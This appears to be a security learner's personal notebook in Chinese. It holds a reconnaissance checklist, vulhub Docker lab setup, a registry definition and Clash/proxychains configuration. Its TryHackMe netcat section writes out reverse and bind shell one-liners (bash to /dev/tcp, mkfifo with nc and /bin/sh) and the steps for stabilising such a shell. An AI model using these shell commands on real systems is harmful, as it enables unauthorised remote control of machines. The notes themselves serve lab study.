1.openvpn连接不上:
若版本>2.5,参数 sudo openvpn data-ciphers AES-256-CBC
oracle
sqlplus:连接oracle数据库,需要输入账号密码
qukuai
信息搜集:
- 服务器真实IP发现
- 服务器指纹识别
- 目标子域探测
- 邮件服务探测
- 证书信息采集
- Web服务组件指纹采集
- Web网站目录探测
- API接口信息泄露
- 域名Whois及备案信息采集
- 端口服务组件指纹采集
- 旁服信息采集
- C段服务采集
- Github/SVN源码泄露发现
- DNS记录分析搜索引擎公开信息采集(google、shodan、zoomeye)
- 企业信息采集
- 敏感文件发现
docker
apt-get install docker docker.compose
安装出问题就按照提示修复安装包,修复不了重启虚拟机。
新建文件夹,把环境需要的.yml文件下载下来,然后运行docker-compose up -d即可
yml在vulhub找
当不想用的时候 运行 docker ps 查看正在运行的环境
然后输入 docker stop 容器id或名称 来关闭
查看容器时,进入容器:
docker exec -it <容器ID或名称> /bin/bash
《长安的荔枝》
《枪炮、病菌与钢铁》
注册表
注册表是windows操作系统,硬件设备以及客户应用程序得以运行和保存设置的核心“数据库”。
简单来说注册表是一个庞大的树状分层结构的数据库系统。
注册表记录了用户安装在计算机上的软件和每个程序的相互关联信息,包括计算机配置或自动配置的即插即用的设备和已用的各种设备说明,状态信息和数据等
tryhackme-nc
1.监听与连接
监听端: nc -lvnp 9999
受控端: nc 控制端ip 9999
2.反弹shell
监听端: nc -lvnp 9999
受控端:bash -i > /dev/tcp/控制端ip/9999
bash -i > /dev/tcp/控制端/9999 0>&1
监听端:python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ //注意python根据监听端版本来选择pythonx,x为大版本。得到受控端的shell,注意到此时仍然不能使用ctrl C以及左右箭头。
上图右边红色框为输入命令后获取的shell
监听端:export TERM=xterm //之后可以使用术语命令比如clear
监听端:ctrl Z //此时shell在后台运行,监听端得以继续操控终端
监听端:stty raw -echo; fg //关闭监听端的终端回显,但是仍然可以使用tab补全、方向键、crtl c结束进程而不是退出shell,并且能够重新切换到受控端的shell。
++++++
3.有效载荷
A端:mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f //这条命令创建了一个管道用于传递数据,“tmp/f”是这个管道的名称,然后使用netcat开启监听端口,<代表将管道的输出视为监听的输入。
B端:nc A端ip PORT
//此时A的shell会弹到B处,B可以控制A
B端:ctrl C可以退出对A的控制
kali clash/proxychains4
https://juejin.cn/post/7124962244370104350
sudo lsof -i tcp:7890
kill 9 pid
./clash
http7890
sock5 7891
how to set clash step-by-step
step1.download
在github上下载,将clash安装到记得的目录中
step2.下载控制面板:因为要操作节点
mkdir /opt/clash/ui && cd /opt/clash/ui //如果安装在opt下
wget https://codeload.github.com/Dreamacro/clash-dashboard/zip/refs/heads/gh-pages //下载了压缩文件
unzip gh-pages
rm -rf gh-pages
mv clash-dashboard-gh-pages/* . //解压然后更美观
step3.修改clash配置文件:
在 /root/.config/clash 目录下有三个文件,将原来的配置文件删除,使用命令rm -rf filename
然后下载新的订阅配置文件,机场关于clash配置中有:
wget -O /etc/clash/config.yaml [你的订阅链接]
然后vim config.yaml 进行配置,找到ui配置,修改为
“external-ui: /opt/clash/ui”
之后使用浏览器通过 127.0.0.0:9090/ui访问控制面板
使用:
将clash cp到bin目录下就可以随意打开
换节点的时候 127.0.0.1:9090/ui修改
一个可行的配置:
clash:规则模式,选了一个网速还行的节点
firefox:浏览器设置
http:127.0.0.1 7890
https:127.0.0.1 7890
socks5:127.0.0.1 7891
可以访问谷歌
使用proxychains4 :
sudo vim /etc/proxychains4.conf
把动态链的#去掉
把静态链的#加上
在配置文件最下面的proxylist处,删掉socks4,加上:
http 127.0.0.1 7890
socks5 127.0.0.1 7891
测试:首先启动 clash
proxychains4 firefox www.whatismyip.com 查看ip